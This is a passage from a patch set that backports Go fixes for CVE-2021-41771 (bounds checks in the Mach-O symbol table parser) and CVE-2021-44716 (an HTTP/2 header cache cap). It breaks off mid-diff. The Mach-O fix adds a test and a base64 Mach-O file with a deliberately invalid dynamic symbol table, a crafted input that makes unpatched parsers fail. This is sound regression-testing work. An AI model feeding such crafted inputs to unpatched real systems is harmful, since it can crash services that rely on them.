+loaded symbol table.
+
+Thanks to Burak Çarıkçı - Yunus Yıldırım (CT-Zer0 Crypttech) for
+reporting this issue.
+
+Updates #48990
+Fixes #48991
+Fixes CVE-2021-41771
+
+Change-Id: Ic3d6e6529241afcc959544b326b21b663262bad5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/355990
+Reviewed-by: Julie Qiu <julie@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+(cherry picked from commit 61536ec03063b4951163bd09609c86d82631fa27)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/359454
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+https://github.com/golang/go/commit/d19c5bdb24e093a2d5097b7623284eb02726cede
+CVE: CVE-2021-41771
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/debug/macho/file.go                                  | 9 +++++++++
+ src/debug/macho/file_test.go                             | 7 +++++++
+ .../testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 | 1 +
+ 3 files changed, 17 insertions(+)
+ create mode 100644 src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+
+diff --git a/src/debug/macho/file.go b/src/debug/macho/file.go
+index 085b0c8219bad..73cfce3c7606e 100644
+--- a/src/debug/macho/file.go
++++ b/src/debug/macho/file.go
+@@ -345,6 +345,15 @@ func NewFile(r io.ReaderAt) (*File, error) {
+ 			if err := binary.Read(b, bo, &hdr); err != nil {
+ 				return nil, err
+ 			}
++			if hdr.Iundefsym > uint32(len(f.Symtab.Syms)) {
++				return nil, &FormatError{offset, fmt.Sprintf(
++					"undefined symbols index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++					hdr.Iundefsym, len(f.Symtab.Syms)), nil}
++			} else if hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms)) {
++				return nil, &FormatError{offset, fmt.Sprintf(
++					"number of undefined symbols after index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++					hdr.Iundefsym+hdr.Nundefsym, len(f.Symtab.Syms)), nil}
++			}
+ 			dat := make([]byte, hdr.Nindirectsyms*4)
+ 			if _, err := r.ReadAt(dat, int64(hdr.Indirectsymoff)); err != nil {
+ 				return nil, err
+diff --git a/src/debug/macho/file_test.go b/src/debug/macho/file_test.go
+index 03915c86e23d9..9beeb80dd27c1 100644
+--- a/src/debug/macho/file_test.go
++++ b/src/debug/macho/file_test.go
+@@ -416,3 +416,10 @@ func TestTypeString(t *testing.T) {
+ 		t.Errorf("got %v, want %v", TypeExec.GoString(), "macho.Exec")
+ 	}
+ }
++
++func TestOpenBadDysymCmd(t *testing.T) {
++	_, err := openObscured("testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64")
++	if err == nil {
++		t.Fatal("openObscured did not fail when opening a file with an invalid dynamic symbol table command")
++	}
++}
+diff --git a/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+new file mode 100644
+index 0000000000000..8e0436639c109
+--- /dev/null
++++ b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+@@ -0,0 +1 @@
++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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqAEiJ5UiD5PBIi30ISI11EIn6g8IBweIDSAHySInR6wRIg8EISIM5AHX2SIPBCOgiAAAAicfoMgAAAPRBU0yNHafw//9BU/8lvwAAAA8fAP8lvgAAAFVIieVIjT0zAAAA6A0AAAC4AAAAAMnD/yXRAAAA/yXTAAAAAAAATI0dwQAAAOm0////TI0dvQAAAOmo////aGVsbG8sIHdvcmxkAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACwAAAAcAAAAkv////////8XAAAAAAAAAAAEAQAAAA4QhgIEAwAAAA0GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDAX/9/AAAIEMBf/38AAAAAAAABAAAAGBAAAAEAAAAQEAAAAQAAAAgQAAABAAAAABAAAAEAAACQDwAAAQAAAJwPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAHgEAAFAPAAABAAAAGwAAAB4BAABkDwAAAQAAAC4AAAAPBgAAGBAAAAEAAAA2AAAADwYAABAQAAABAAAAPgAAAA8GAAAAEAAAAQAAAEoAAAADABAAAAAAAAEAAABeAAAADwYAAAgQAAABAAAAZwAAAA8BAABqDwAAAQAAAG0AAAAPAQAAFA8AAAEAAABzAAAAAQABAgAAAAAAAAAAeQAAAAEAAQIAAAAAAAAAAAkAAAAKAAAACQAAAAoAAAAgAGR5bGRfc3R1Yl9iaW5kaW5nX2hlbHBlcgBfX2R5bGRfZnVuY19sb29rdXAAX05YQXJnYwBfTlhBcmd2AF9fX3Byb2duYW1lAF9fbWhfZXhlY3V0ZV9oZWFkZXIAX2Vudmlyb24AX21haW4Ac3RhcnQAX2V4aXQAX3B1dHMAAA==
+\ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
new file mode 100644
index 0000000000..9c4fee2db4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
@@ -0,0 +1,93 @@
+From 9f1860075990e7bf908ca7cc329d1d3ef91741c8 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 9 Dec 2021 06:13:31 -0500
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d0aebe3e74fe14799f97ddd3f01129697c6a290a]
+CVE: CVE-2021-44716
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Pull in security fix
+
+    a5309b3 http2: cap the size of the server's canonical header cache
+
+Updates #50058
+Fixes CVE-2021-44716
+
+Change-Id: Ifdd13f97fce168de5fb4b2e74ef2060d059800b9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370575
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+(cherry picked from commit d0aebe3e74fe14799f97ddd3f01129697c6a290a)
+---
+ src/go.mod                |  2 +-
+ src/go.sum                |  4 ++--
+ src/net/http/h2_bundle.go | 10 +++++++++-
+ src/vendor/modules.txt    |  2 +-
+ 4 files changed, 13 insertions(+), 5 deletions(-)
+
+diff --git a/src/go.mod b/src/go.mod
+index ec6bd98..56f2fbb 100644
+--- a/src/go.mod
++++ b/src/go.mod
+@@ -4,7 +4,7 @@ go 1.14
+ 
+ require (
+ 	golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d
+-	golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++	golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ 	golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf // indirect
+ 	golang.org/x/text v0.3.3-0.20191031172631-4b67af870c6f // indirect
+ )
+diff --git a/src/go.sum b/src/go.sum
+index 171e083..1ceba05 100644
+--- a/src/go.sum
++++ b/src/go.sum
+@@ -2,8 +2,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d h1:9FCpayM9Egr1baVnV1SX0H87m+XB0B8S0hAMi99X/3U=
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+ golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057 h1:HThQeV5c0Ab/Puir+q6mC97b7+3dfZdsLWMLoBrzo68=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca h1:UmeWAm8AwB6NA/e4FSaGlK1EKTLXKX3utx4Si+6kfPg=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+ golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+ golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf h1:+4j7oujXP478CVb/AFvHJmVX5+Pczx2NGts5yirA0oY=
